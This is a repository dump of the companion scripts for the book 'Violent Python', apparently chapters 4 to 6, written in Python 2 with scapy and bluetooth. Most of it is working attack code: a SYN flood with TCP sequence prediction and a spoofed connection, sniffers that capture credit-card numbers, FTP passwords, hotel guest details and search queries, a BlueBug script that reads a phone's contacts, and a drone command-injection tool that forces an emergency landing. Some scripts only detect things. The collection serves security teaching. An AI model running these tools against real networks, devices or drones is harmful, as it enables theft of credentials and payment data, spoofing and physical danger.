/CH4/8-testDomainFlux.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | # -*- coding: utf-8 -*- 3 | from scapy.all import * 4 | 5 | 6 | def dnsQRTest(pkt): 7 | if pkt.haslayer(DNSRR) and pkt.getlayer(UDP).sport == 53: 8 | rcode = pkt.getlayer(DNS).rcode 9 | qname = pkt.getlayer(DNSQR).qname 10 | if rcode == 3: 11 | print '[!] Name request lookup failed: ' + qname 12 | return True 13 | else: 14 | return False 15 | 16 | 17 | def main(): 18 | unAnsReqs = 0 19 | pkts = rdpcap('domainFlux.pcap') 20 | for pkt in pkts: 21 | if dnsQRTest(pkt): 22 | unAnsReqs = unAnsReqs + 1 23 | print '[!] '+str(unAnsReqs)+' Total Unanswered Name Requests' 24 | 25 | 26 | if __name__ == '__main__': 27 | main() 28 | -------------------------------------------------------------------------------- /CH4/9-mitnickAttack.py: -------------------------------------------------------------------------------- 1 | import optparse 2 | from scapy.all import * 3 | 4 | 5 | def synFlood(src, tgt): 6 | for sport in range(1024,65535): 7 | IPlayer = IP(src=src, dst=tgt) 8 | TCPlayer = TCP(sport=sport, dport=513) 9 | pkt = IPlayer / TCPlayer 10 | send(pkt) 11 | 12 | 13 | def calTSN(tgt): 14 | seqNum = 0 15 | preNum = 0 16 | diffSeq = 0 17 | 18 | for x in range(1, 5): 19 | if preNum != 0: 20 | preNum = seqNum 21 | pkt = IP(dst=tgt) / TCP() 22 | ans = sr1(pkt, verbose=0) 23 | seqNum = ans.getlayer(TCP).seq 24 | diffSeq = seqNum - preNum 25 | print '[+] TCP Seq Difference: ' + str(diffSeq) 26 | return seqNum + diffSeq 27 | 28 | 29 | def spoofConn(src, tgt, ack): 30 | IPlayer = IP(src=src, dst=tgt) 31 | TCPlayer = TCP(sport=513, dport=514) 32 | synPkt = IPlayer / TCPlayer 33 | send(synPkt) 34 | 35 | IPlayer = IP(src=src, dst=tgt) 36 | TCPlayer = TCP(sport=513, dport=514, ack=ack) 37 | ackPkt = IPlayer / TCPlayer 38 | send(ackPkt) 39 | 40 | 41 | def main(): 42 | parser = optparse.OptionParser('usage %prog '+\ 43 | '-s -S '+\ 44 | '-t ') 45 | parser.add_option('-s', dest='synSpoof', type='string',\ 46 | help='specifc src for SYN Flood') 47 | parser.add_option('-S', dest='srcSpoof', type='string',\ 48 | help='specify src for spoofed connection') 49 | parser.add_option('-t', dest='tgt', type='string',\ 50 | help='specify target address') 51 | (options, args) = parser.parse_args() 52 | 53 | if options.synSpoof == None or options.srcSpoof == None \ 54 | or options.tgt == None: 55 | print parser.usage 56 | exit(0) 57 | else: 58 | synSpoof = options.synSpoof 59 | srcSpoof = options.srcSpoof 60 | tgt = options.tgt 61 | 62 | print '[+] Starting SYN Flood to suppress remote server.' 63 | synFlood(synSpoof, srcSpoof) 64 | print '[+] Calculating correct TCP Sequence Number.' 65 | seqNum = calTSN(tgt) + 1 66 | print '[+] Spoofing Connection.' 67 | spoofConn(srcSpoof, tgt, seqNum) 68 | print '[+] Done.' 69 | 70 | 71 | if __name__ == '__main__': 72 | main() 73 | -------------------------------------------------------------------------------- /CH4/attack.pcap: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hmaverickadams/Violent-Python-Companion-Files/34b31de387e2ce152ee6f9320d2bad4451c91267/CH4/attack.pcap -------------------------------------------------------------------------------- /CH4/domainFlux.pcap: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hmaverickadams/Violent-Python-Companion-Files/34b31de387e2ce152ee6f9320d2bad4451c91267/CH4/domainFlux.pcap -------------------------------------------------------------------------------- /CH4/download.pcap: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hmaverickadams/Violent-Python-Companion-Files/34b31de387e2ce152ee6f9320d2bad4451c91267/CH4/download.pcap -------------------------------------------------------------------------------- /CH4/fastFlux.pcap: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hmaverickadams/Violent-Python-Companion-Files/34b31de387e2ce152ee6f9320d2bad4451c91267/CH4/fastFlux.pcap -------------------------------------------------------------------------------- /CH4/geotest.kml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 110.8.88.36 6 | 7 | 127.500000,37.000000 8 | 9 | 10 | 11 | 188.39.7.79 12 | 13 | -0.093100,51.514200 14 | 15 | 16 | 17 | 28.38.166.8 18 | 19 | -82.998800,39.961200 20 | 21 | 22 | 23 | 21.133.59.224 24 | 25 | -82.998800,39.961200 26 | 27 | 28 | 29 | 153.117.22.211 30 | 31 | -97.278200,37.752100 32 | 33 | 34 | 35 | 138.88.201.132 36 | 37 | -76.580600,38.344800 38 | 39 | 40 | 41 | 1.103.102.104 42 | 43 | 127.500000,37.000000 44 | 45 | 46 | 47 | 166.123.95.157 48 | 49 | -77.041700,38.897900 50 | 51 | 52 | 53 | 219.173.149.77 54 | 55 | 140.533300,40.633300 56 | 57 | 58 | 59 | 8.155.194.116 60 | 61 | -97.000000,38.000000 62 | 63 | 64 | 65 | 215.60.119.128 66 | 67 | -82.998800,39.961200 68 | 69 | 70 | 71 | 133.115.139.226 72 | 73 | 138.000000,36.000000 74 | 75 | 76 | 77 | 137.153.2.196 78 | 79 | 139.751400,35.685000 80 | 81 | 82 | 83 | 217.30.118.1 84 | 85 | -3.200000,55.950000 86 | 87 | 88 | 89 | 63.77.163.212 90 | 91 | -97.000000,38.000000 92 | 93 | 94 | 95 | 57.70.59.157 96 | 97 | 145.256000,-37.974000 98 | 99 | 100 | 101 | 89.233.181.180 102 | 103 | 14.466700,50.083300 104 | 105 | 106 | 107 | 108 | 109 | -------------------------------------------------------------------------------- /CH4/geotest.pcap: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hmaverickadams/Violent-Python-Companion-Files/34b31de387e2ce152ee6f9320d2bad4451c91267/CH4/geotest.pcap -------------------------------------------------------------------------------- /CH4/hivemind.pcap: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hmaverickadams/Violent-Python-Companion-Files/34b31de387e2ce152ee6f9320d2bad4451c91267/CH4/hivemind.pcap -------------------------------------------------------------------------------- /CH5/.DS_Store: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hmaverickadams/Violent-Python-Companion-Files/34b31de387e2ce152ee6f9320d2bad4451c91267/CH5/.DS_Store -------------------------------------------------------------------------------- /CH5/1-testSniff.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | # -*- coding: utf-8 -*- 3 | 4 | from scapy.all import * 5 | 6 | 7 | def pktPrint(pkt): 8 | if pkt.haslayer(Dot11Beacon): 9 | print '[+] Detected 802.11 Beacon Frame' 10 | elif pkt.haslayer(Dot11ProbeReq): 11 | print '[+] Detected 802.11 Probe Request Frame' 12 | elif pkt.haslayer(TCP): 13 | print '[+] Detected a TCP Packet' 14 | elif pkt.haslayer(DNS): 15 | print '[+] Detected a DNS Packet' 16 | 17 | 18 | conf.iface = 'mon0' 19 | sniff(prn=pktPrint) 20 | -------------------------------------------------------------------------------- /CH5/10-iphoneFinder.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | # -*- coding: utf-8 -*- 3 | 4 | from scapy.all import * 5 | from bluetooth import * 6 | 7 | 8 | def retBtAddr(addr): 9 | btAddr=str(hex(int(addr.replace(':', ''), 16) + 1))[2:] 10 | btAddr=btAddr[0:2]+":"+btAddr[2:4]+":"+btAddr[4:6]+":"+\ 11 | btAddr[6:8]+":"+btAddr[8:10]+":"+btAddr[10:12] 12 | return btAddr 13 | 14 | def checkBluetooth(btAddr): 15 | btName = lookup_name(btAddr) 16 | if btName: 17 | print '[+] Detected Bluetooth Device: ' + btName 18 | else: 19 | print '[-] Failed to Detect Bluetooth Device.' 20 | 21 | 22 | def wifiPrint(pkt): 23 | iPhone_OUI = 'd0:23:db' 24 | if pkt.haslayer(Dot11): 25 | wifiMAC = pkt.getlayer(Dot11).addr2 26 | if iPhone_OUI == wifiMAC[:8]: 27 | print '[*] Detected iPhone MAC: ' + wifiMAC 28 | btAddr = retBtAddr(wifiMAC) 29 | print '[+] Testing Bluetooth MAC: ' + btAddr 30 | checkBluetooth(btAddr) 31 | 32 | 33 | conf.iface = 'mon0' 34 | sniff(prn=wifiPrint) 35 | -------------------------------------------------------------------------------- /CH5/11-rfcommScan.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | # -*- coding: utf-8 -*- 3 | 4 | from bluetooth import * 5 | 6 | 7 | def rfcommCon(addr, port): 8 | sock = BluetoothSocket(RFCOMM) 9 | try: 10 | sock.connect((addr, port)) 11 | print '[+] RFCOMM Port ' + str(port) + ' open' 12 | sock.close() 13 | except Exception, e: 14 | print '[-] RFCOMM Port ' + str(port) + ' closed' 15 | 16 | 17 | for port in range(1, 30): 18 | rfcommCon('00:16:38:DE:AD:11', port) 19 | -------------------------------------------------------------------------------- /CH5/12-sdpScan.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | # -*- coding: utf-8 -*- 3 | from bluetooth import * 4 | 5 | 6 | def sdpBrowse(addr): 7 | services = find_service(address=addr) 8 | for service in services: 9 | name = service['name'] 10 | proto = service['protocol'] 11 | port = str(service['port']) 12 | print '[+] Found ' + str(name) + ' on ' + str(proto) + ':' + port 13 | 14 | 15 | sdpBrowse('00:16:38:DE:AD:11') 16 | -------------------------------------------------------------------------------- /CH5/13-ninjaPrint.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | # -*- coding: utf-8 -*- 3 | 4 | import obexftp 5 | 6 | try: 7 | btPrinter = obexftp.client(obexftp.BLUETOOTH) 8 | btPrinter.connect('00:16:38:DE:AD:11', 2) 9 | btPrinter.put_file('/tmp/ninja.jpg') 10 | print '[+] Printed Ninja Image.' 11 | except: 12 | 13 | print '[-] Failed to print Ninja Image.' 14 | -------------------------------------------------------------------------------- /CH5/14-blueBug.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | # -*- coding: utf-8 -*- 3 | import bluetooth 4 | 5 | tgtPhone = 'AA:BB:CC:DD:EE:FF' 6 | 7 | port = 17 8 | 9 | phoneSock = bluetooth.BluetoothSocket(bluetooth.RFCOMM) 10 | phoneSock.connect((tgtPhone, port)) 11 | 12 | for contact in range(1, 5): 13 | atCmd = 'AT+CPBR=' + str(contact) + '\n' 14 | phoneSock.send(atCmd) 15 | result = client_sock.recv(1024) 16 | print '[+] ' + str(contact) + ' : ' + result 17 | 18 | sock.close() 19 | -------------------------------------------------------------------------------- /CH5/2-creditSniff.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | # -*- coding: utf-8 -*- 3 | import re 4 | import optparse 5 | from scapy.all import * 6 | 7 | 8 | def findCreditCard(pkt): 9 | raw = pkt.sprintf('%Raw.load%') 10 | americaRE = re.findall('3[47][0-9]{13}', raw) 11 | masterRE = re.findall('5[1-5][0-9]{14}', raw) 12 | visaRE = re.findall('4[0-9]{12}(?:[0-9]{3})?', raw) 13 | 14 | if americaRE: 15 | print '[+] Found American Express Card: ' + americaRE[0] 16 | if masterRE: 17 | print '[+] Found MasterCard Card: ' + masterRE[0] 18 | if visaRE: 19 | print '[+] Found Visa Card: ' + visaRE[0] 20 | 21 | 22 | def main(): 23 | parser = optparse.OptionParser('usage %prog -i ') 24 | parser.add_option('-i', dest='interface', type='string',\ 25 | help='specify interface to listen on') 26 | (options, args) = parser.parse_args() 27 | 28 | if options.interface == None: 29 | print parser.usage 30 | exit(0) 31 | else: 32 | conf.iface = options.interface 33 | 34 | try: 35 | print '[*] Starting Credit Card Sniffer.' 36 | sniff(filter='tcp', prn=findCreditCard, store=0) 37 | except KeyboardInterrupt: 38 | exit(0) 39 | 40 | 41 | if __name__ == '__main__': 42 | main() 43 | -------------------------------------------------------------------------------- /CH5/3-hotelSniff.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | # -*- coding: utf-8 -*- 3 | 4 | import optparse 5 | from scapy.all import * 6 | 7 | 8 | def findGuest(pkt): 9 | raw = pkt.sprintf('%Raw.load%') 10 | name = re.findall('(?i)LAST_NAME=(.*)&', raw) 11 | room = re.findall("(?i)ROOM_NUMBER=(.*)'", raw) 12 | if name: 13 | print '[+] Found Hotel Guest ' + str(name[0])+\ 14 | ', Room #' + str(room[0]) 15 | 16 | 17 | def main(): 18 | parser = optparse.OptionParser('usage %prog '+\ 19 | '-i ') 20 | parser.add_option('-i', dest='interface',\ 21 | type='string', help='specify interface to listen on') 22 | (options, args) = parser.parse_args() 23 | 24 | if options.interface == None: 25 | print parser.usage 26 | exit(0) 27 | else: 28 | conf.iface = options.interface 29 | 30 | try: 31 | print '[*] Starting Hotel Guest Sniffer.' 32 | sniff(filter='tcp', prn=findGuest, store=0) 33 | except KeyboardInterrupt: 34 | exit(0) 35 | 36 | 37 | if __name__ == '__main__': 38 | main() 39 | -------------------------------------------------------------------------------- /CH5/4-googleSniff.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | # -*- coding: utf-8 -*- 3 | import optparse 4 | from scapy.all import * 5 | 6 | 7 | def findGoogle(pkt): 8 | if pkt.haslayer(Raw): 9 | payload = pkt.getlayer(Raw).load 10 | if 'GET' in payload: 11 | if 'google' in payload: 12 | r = re.findall(r'(?i)\&q=(.*?)\&', payload) 13 | if r: 14 | search = r[0].split('&')[0] 15 | search = search.replace('q=', '').\ 16 | replace('+', ' ').replace('%20', ' ') 17 | print '[+] Searched For: ' + search 18 | 19 | 20 | def main(): 21 | parser = optparse.OptionParser('usage %prog -i '+\ 22 | '') 23 | parser.add_option('-i', dest='interface', \ 24 | type='string', help='specify interface to listen on') 25 | (options, args) = parser.parse_args() 26 | 27 | if options.interface == None: 28 | print parser.usage 29 | exit(0) 30 | else: 31 | conf.iface = options.interface 32 | 33 | try: 34 | print '[*] Starting Google Sniffer.' 35 | sniff(filter='tcp port 80', prn=findGoogle) 36 | except KeyboardInterrupt: 37 | exit(0) 38 | 39 | 40 | if __name__ == '__main__': 41 | main() 42 | 43 | -------------------------------------------------------------------------------- /CH5/5-ftpSniff.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | # -*- coding: utf-8 -*- 3 | 4 | import optparse 5 | from scapy.all import * 6 | 7 | 8 | def ftpSniff(pkt): 9 | 10 | dest = pkt.getlayer(IP).dst 11 | raw = pkt.sprintf('%Raw.load%') 12 | user = re.findall('(?i)USER (.*)', raw) 13 | pswd = re.findall('(?i)PASS (.*)', raw) 14 | 15 | if user: 16 | print '[*] Detected FTP Login to ' + str(dest) 17 | print '[+] User account: ' + str(user[0]) 18 | elif pswd: 19 | print '[+] Password: ' + str(pswd[0]) 20 | 21 | 22 | def main(): 23 | parser = optparse.OptionParser('usage %prog '+\ 24 | '-i ') 25 | parser.add_option('-i', dest='interface', \ 26 | type='string', help='specify interface to listen on') 27 | (options, args) = parser.parse_args() 28 | 29 | if options.interface == None: 30 | print parser.usage 31 | exit(0) 32 | else: 33 | conf.iface = options.interface 34 | 35 | try: 36 | sniff(filter='tcp port 21', prn=ftpSniff) 37 | except KeyboardInterrupt: 38 | exit(0) 39 | 40 | 41 | if __name__ == '__main__': 42 | main() 43 | 44 | 45 | -------------------------------------------------------------------------------- /CH5/6-sniffHidden.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | # -*- coding: utf-8 -*- 3 | import sys 4 | from scapy.all import * 5 | 6 | interface = 'mon0' 7 | 8 | hiddenNets = [] 9 | unhiddenNets = [] 10 | 11 | def sniffDot11(p): 12 | 13 | if p.haslayer(Dot11ProbeResp): 14 | addr2 = p.getlayer(Dot11).addr2 15 | if (addr2 in hiddenNets) & (addr2 not in unhiddenNets): 16 | netName = p.getlayer(Dot11ProbeResp).info 17 | print '[+] Decloaked Hidden SSID : ' +\ 18 | netName + ' for MAC: ' + addr2 19 | unhiddenNets.append(addr2) 20 | 21 | if p.haslayer(Dot11Beacon): 22 | if p.getlayer(Dot11Beacon).info == '': 23 | addr2 = p.getlayer(Dot11).addr2 24 | if addr2 not in hiddenNets: 25 | print '[-] Detected Hidden SSID: ' +\ 26 | 'with MAC:' + addr2 27 | hiddenNets.append(addr2) 28 | 29 | 30 | sniff(iface=interface, prn=sniffDot11) 31 | 32 | -------------------------------------------------------------------------------- /CH5/6-sniffProbe.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | # -*- coding: utf-8 -*- 3 | from scapy.all import * 4 | 5 | interface = 'mon0' 6 | probeReqs = [] 7 | 8 | 9 | def sniffProbe(p): 10 | if p.haslayer(Dot11ProbeReq): 11 | netName = p.getlayer(Dot11ProbeReq).info 12 | if netName not in probeReqs: 13 | probeReqs.append(netName) 14 | print '[+] Detected New Probe Request: ' + netName 15 | 16 | 17 | sniff(iface=interface, prn=sniffProbe) 18 | 19 | -------------------------------------------------------------------------------- /CH5/7-dup.py: -------------------------------------------------------------------------------- 1 | from scapy.all import * 2 | 3 | def dupRadio(pkt): 4 | rPkt=pkt.getlayer(RadioTap) 5 | version=rPkt.version 6 | pad=rPkt.pad 7 | present=rPkt.present 8 | notdecoded=rPkt.notdecoded 9 | nPkt = RadioTap(version=version,pad=pad,present=present,notdecoded=notdecoded) 10 | return nPkt 11 | 12 | def dupDot11(pkt): 13 | dPkt=pkt.getlayer(Dot11) 14 | subtype=dPkt.subtype 15 | Type=dPkt.type 16 | proto=dPkt.proto 17 | FCfield=dPkt.FCfield 18 | ID=dPkt.ID 19 | addr1=dPkt.addr1 20 | addr2=dPkt.addr2 21 | addr3=dPkt.addr3 22 | SC=dPkt.SC 23 | addr4=dPkt.addr4 24 | nPkt=Dot11(subtype=subtype,type=Type,proto=proto,FCfield=FCfield,ID=ID,addr1=addr1,addr2=addr2,addr3=addr3,SC=SC,addr4=addr4) 25 | return nPkt 26 | 27 | def dupSNAP(pkt): 28 | sPkt=pkt.getlayer(SNAP) 29 | oui=sPkt.OUI 30 | code=sPkt.code 31 | nPkt=SNAP(OUI=oui,code=code) 32 | return nPkt 33 | 34 | def dupLLC(pkt): 35 | lPkt=pkt.getlayer(LLC) 36 | dsap=lPkt.dsap 37 | ssap=lPkt.ssap 38 | ctrl=lPkt.ctrl 39 | nPkt=LLC(dsap=dsap,ssap=ssap,ctrl=ctrl) 40 | return nPkt 41 | 42 | def dupIP(pkt): 43 | iPkt=pkt.getlayer(IP) 44 | version=iPkt.version 45 | tos=iPkt.tos 46 | ID=iPkt.id 47 | flags=iPkt.flags 48 | ttl=iPkt.ttl 49 | proto=iPkt.proto 50 | src=iPkt.src 51 | dst=iPkt.dst 52 | options=iPkt.options 53 | nPkt=IP(version=version,id=ID,tos=tos,flags=flags,ttl=ttl,proto=proto,src=src,dst=dst,options=options) 54 | return nPkt 55 | 56 | def dupUDP(pkt): 57 | uPkt=pkt.getlayer(UDP) 58 | sport=uPkt.sport 59 | dport=uPkt.dport 60 | nPkt=UDP(sport=sport,dport=dport) 61 | return nPkt 62 | 63 | -------------------------------------------------------------------------------- /CH5/7-uavSniff.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | # -*- coding: utf-8 -*- 3 | import threading 4 | import dup 5 | from scapy.all import * 6 | 7 | conf.iface = 'mon0' 8 | NAVPORT = 5556 9 | LAND = '290717696' 10 | EMER = '290717952' 11 | TAKEOFF = '290718208' 12 | 13 | 14 | class interceptThread(threading.Thread): 15 | 16 | def __init__(self): 17 | threading.Thread.__init__(self) 18 | self.curPkt = None 19 | self.seq = 0 20 | self.foundUAV = False 21 | 22 | def run(self): 23 | sniff(prn=self.interceptPkt, filter='udp port 5556') 24 | 25 | def interceptPkt(self, pkt): 26 | if self.foundUAV == False: 27 | print '[*] UAV Found.' 28 | self.foundUAV = True 29 | self.curPkt = pkt 30 | raw = pkt.sprintf('%Raw.load%') 31 | try: 32 | self.seq = int(raw.split(',')[0].split('=')[-1]) + 5 33 | except: 34 | self.seq = 0 35 | 36 | def injectCmd(self, cmd): 37 | radio = dup.dupRadio(self.curPkt) 38 | dot11 = dup.dupDot11(self.curPkt) 39 | snap = dup.dupSNAP(self.curPkt) 40 | llc = dup.dupLLC(self.curPkt) 41 | ip = dup.dupIP(self.curPkt) 42 | udp = dup.dupUDP(self.curPkt) 43 | raw = Raw(load=cmd) 44 | injectPkt = radio / dot11 / llc / snap / ip / udp / raw 45 | sendp(injectPkt) 46 | 47 | def emergencyland(self): 48 | spoofSeq = self.seq + 100 49 | watch = 'AT*COMWDG=%i\r' %spoofSeq 50 | toCmd = 'AT*REF=%i,%s\r' % (spoofSeq + 1, EMER) 51 | self.injectCmd(watch) 52 | self.injectCmd(toCmd) 53 | 54 | def takeoff(self): 55 | spoofSeq = self.seq + 100 56 | watch = 'AT*COMWDG=%i\r' %spoofSeq 57 | toCmd = 'AT*REF=%i,%s\r' % (spoofSeq + 1, TAKEOFF) 58 | self.injectCmd(watch) 59 | self.injectCmd(toCmd) 60 | 61 | 62 | def main(): 63 | uavIntercept = interceptThread() 64 | uavIntercept.start() 65 | print '[*] Listening for UAV Traffic. Please WAIT...' 66 | while uavIntercept.foundUAV == False: 67 | pass 68 | 69 | while True: 70 | tmp = raw_input('[-] Press ENTER to Emergency Land UAV.') 71 | uavIntercept.emergencyland() 72 | 73 | if __name__ == '__main__': 74 | main() 75 | -------------------------------------------------------------------------------- /CH5/8-fireCatcher.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | # -*- coding: utf-8 -*- 3 | 4 | import re 5 | import optparse 6 | from scapy.all import * 7 | 8 | cookieTable = {} 9 | 10 | 11 | def fireCatcher(pkt): 12 | raw = pkt.sprintf('%Raw.load%') 13 | r = re.findall('wordpress_[0-9a-fA-F]{32}', raw) 14 | if r and 'Set' not in raw: 15 | if r[0] not in cookieTable.keys(): 16 | cookieTable[r[0]] = pkt.getlayer(IP).src 17 | print '[+] Detected and indexed cookie.' 18 | elif cookieTable[r[0]] != pkt.getlayer(IP).src: 19 | print '[*] Detected Conflict for ' + r[0] 20 | print 'Victim = ' + cookieTable[r[0]] 21 | print 'Attacker = ' + pkt.getlayer(IP).src 22 | 23 | 24 | def main(): 25 | parser = optparse.OptionParser("usage %prog -i ") 26 | parser.add_option('-i', dest='interface', type='string',\ 27 | help='specify interface to listen on') 28 | (options, args) = parser.parse_args() 29 | 30 | if options.interface == None: 31 | print parser.usage 32 | exit(0) 33 | else: 34 | conf.iface = options.interface 35 | 36 | try: 37 | sniff(filter='tcp port 80', prn=fireCatcher) 38 | except KeyboardInterrupt: 39 | exit(0) 40 | 41 | 42 | if __name__ == '__main__': 43 | main() 44 | -------------------------------------------------------------------------------- /CH5/9-btFind.py: -------------------------------------------------------------------------------- 1 | import time 2 | from bluetooth import * 3 | from datetime import datetime 4 | 5 | def findTgt(tgtName): 6 | foundDevs = discover_devices(lookup_names=True) 7 | for (addr, name) in foundDevs: 8 | if tgtName == name: 9 | print '[*] Found Target Device ' + tgtName 10 | print '[+] With MAC Address: ' + addr 11 | print '[+] Time is: '+str(datetime.now()) 12 | 13 | 14 | tgtName = 'TJ iPhone' 15 | while True: 16 | print '[-] Scanning for Bluetooth Device: ' + tgtName 17 | findTgt(tgtName) 18 | time.sleep(5) 19 | 20 | -------------------------------------------------------------------------------- /CH5/9-btScan.py: -------------------------------------------------------------------------------- 1 | import time 2 | from bluetooth import * 3 | 4 | alreadyFound = [] 5 | 6 | 7 | def findDevs(): 8 | foundDevs = discover_devices(lookup_names=True) 9 | for (addr, name) in foundDevs: 10 | if addr not in alreadyFound: 11 | print '[*] Found Bluetooth Device: ' + str(name) 12 | print '[+] MAC address: ' + str(addr) 13 | alreadyFound.append(addr) 14 | 15 | 16 | while True: 17 | findDevs() 18 | time.sleep(5) 19 | 20 | 21 | -------------------------------------------------------------------------------- /CH5/dup.py: -------------------------------------------------------------------------------- 1 | from scapy.all import * 2 | 3 | def dupRadio(pkt): 4 | rPkt=pkt.getlayer(RadioTap) 5 | version=rPkt.version 6 | pad=rPkt.pad 7 | present=rPkt.present 8 | notdecoded=rPkt.notdecoded 9 | nPkt = RadioTap(version=version,pad=pad,present=present,notdecoded=notdecoded) 10 | return nPkt 11 | 12 | def dupDot11(pkt): 13 | dPkt=pkt.getlayer(Dot11) 14 | subtype=dPkt.subtype 15 | Type=dPkt.type 16 | proto=dPkt.proto 17 | FCfield=dPkt.FCfield 18 | ID=dPkt.ID 19 | addr1=dPkt.addr1 20 | addr2=dPkt.addr2 21 | addr3=dPkt.addr3 22 | SC=dPkt.SC 23 | addr4=dPkt.addr4 24 | nPkt=Dot11(subtype=subtype,type=Type,proto=proto,FCfield=FCfield,ID=ID,addr1=addr1,addr2=addr2,addr3=addr3,SC=SC,addr4=addr4) 25 | return nPkt 26 | 27 | def dupSNAP(pkt): 28 | sPkt=pkt.getlayer(SNAP) 29 | oui=sPkt.OUI 30 | code=sPkt.code 31 | nPkt=SNAP(OUI=oui,code=code) 32 | return nPkt 33 | 34 | def dupLLC(pkt): 35 | lPkt=pkt.getlayer(LLC) 36 | dsap=lPkt.dsap 37 | ssap=lPkt.ssap 38 | ctrl=lPkt.ctrl 39 | nPkt=LLC(dsap=dsap,ssap=ssap,ctrl=ctrl) 40 | return nPkt 41 | 42 | def dupIP(pkt): 43 | iPkt=pkt.getlayer(IP) 44 | version=iPkt.version 45 | tos=iPkt.tos 46 | ID=iPkt.id 47 | flags=iPkt.flags 48 | ttl=iPkt.ttl 49 | proto=iPkt.proto 50 | src=iPkt.src 51 | dst=iPkt.dst 52 | options=iPkt.options 53 | nPkt=IP(version=version,id=ID,tos=tos,flags=flags,ttl=ttl,proto=proto,src=src,dst=dst,options=options) 54 | return nPkt 55 | 56 | def dupUDP(pkt): 57 | uPkt=pkt.getlayer(UDP) 58 | sport=uPkt.sport 59 | dport=uPkt.dport 60 | nPkt=UDP(sport=sport,dport=dport) 61 | return nPkt 62 | 63 | -------------------------------------------------------------------------------- /CH6/.DS_Store: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hmaverickadams/Violent-Python-Companion-Files/34b31de387e2ce152ee6f9320d2bad4451c91267/CH6/.DS_Store -------------------------------------------------------------------------------- /CH6/.project: -------------------------------------------------------------------------------- 1 | 2 | 3 | book_scripts 4 | 5 | 6 | 7 | 8 | 9 | org.python.pydev.PyDevBuilder 10 | 11 | 12 | 13 | 14 | 15 | org.python.pydev.pythonNature 16 | 17 | 18 | -------------------------------------------------------------------------------- /CH6/.pydevproject: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Default 6 | python 2.7 7 | 8 | -------------------------------------------------------------------------------- /CH6/.svn/entries: -------------------------------------------------------------------------------- 1 | 10 2 | 3 | dir 4 | 2 5 | svn://192.168.1.100/code_repo/book_scripts 6 | svn://192.168.1.100/code_repo 7 | 8 | 9 | 10 | 2012-01-13T00:46:35.653694Z 11 | 2 12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | 23 | 24 | 25 | 26 | 27 | 02d88a86-f816-4d4a-8b85-92750d4e3223 28 | 29 | web_common.pyc 30 | file 31 | 3 32 | 33 | 34 | 35 | 2012-01-15T19:47:29.189829Z 36 | 5c09afcc1c82c9cae1331ef4665153db 37 | 2012-01-15T21:34:36.879321Z 38 | 3 39 | 40 | has-props 41 | 42 | 43 | 44 | 45 | 46 | 47 | 48 | 49 | 50 | 51 | 52 | 53 | 54 | 55 | 56 | 57 | 58 | 59 | 60 | 61 | 1290 62 | 63 | anon_scrape.py 64 | file 65 | 3 66 | 67 | 68 | 69 | 2012-01-16T03:58:18.000000Z 70 | 52abc7b0645ae5b2eff6d237d50db4fa 71 | 2012-01-15T21:34:36.879321Z 72 | 3 73 | 74 | 75 | 76 | 77 | 78 | 79 | 80 | 81 | 82 | 83 | 84 | 85 | 86 | 87 | 88 | 89 | 90 | 91 | 92 | 93 | 94 | 95 | 4403 96 | 97 | twitter_locate.py 98 | file 99 | 3 100 | 101 | 102 | 103 | 2012-01-15T20:48:51.000000Z 104 | 27ea515dcfe9e2405f8818d967fc11d9 105 | 2012-01-15T21:34:36.879321Z 106 | 3 107 | 108 | 109 | 110 | 111 | 112 | 113 | 114 | 115 | 116 | 117 | 118 | 119 | 120 | 121 | 122 | 123 | 124 | 125 | 126 | 127 | 128 | 129 | 712 130 | 131 | violent_email.pyc 132 | file 133 | 7 134 | 135 | 136 | 137 | 2012-01-23T02:27:12.000000Z 138 | a817e7e730e63478a32d49e837426bca 139 | 2012-01-25T02:33:22.614031Z 140 | 7 141 | 142 | has-props 143 | 144 | 145 | 146 | 147 | 148 | 149 | 150 | 151 | 152 | 153 | 154 | 155 | 156 | 157 | 158 | 159 | 160 | 161 | 162 | 163 | 1169 164 | 165 | .project 166 | file 167 | 168 | 169 | 170 | 171 | 2012-01-11T02:00:22.000000Z 172 | f35f223d68c00afce8aa5d09217b04cc 173 | 2012-01-13T00:46:35.653694Z 174 | 2 175 | 176 | 177 | 178 | 179 | 180 | 181 | 182 | 183 | 184 | 185 | 186 | 187 | 188 | 189 | 190 | 191 | 192 | 193 | 194 | 195 | 196 | 197 | 366 198 | 199 | twitter.py 200 | file 201 | 9 202 | 203 | 204 | 205 | 2012-02-17T16:30:14.000000Z 206 | 61d9e71186d92cbb89bed29ecd2967b8 207 | 2012-02-17T17:04:16.640470Z 208 | 9 209 | 210 | 211 | 212 | 213 | 214 | 215 | 216 | 217 | 218 | 219 | 220 | 221 | 222 | 223 | 224 | 225 | 226 | 227 | 228 | 229 | 230 | 231 | 1019 232 | 233 | twitter_interests.py 234 | file 235 | 3 236 | 237 | 238 | 239 | 2012-01-15T21:30:41.000000Z 240 | 4b70a2a7d38b2dcd3724ad2a04cbbb02 241 | 2012-01-15T21:34:36.879321Z 242 | 3 243 | 244 | 245 | 246 | 247 | 248 | 249 | 250 | 251 | 252 | 253 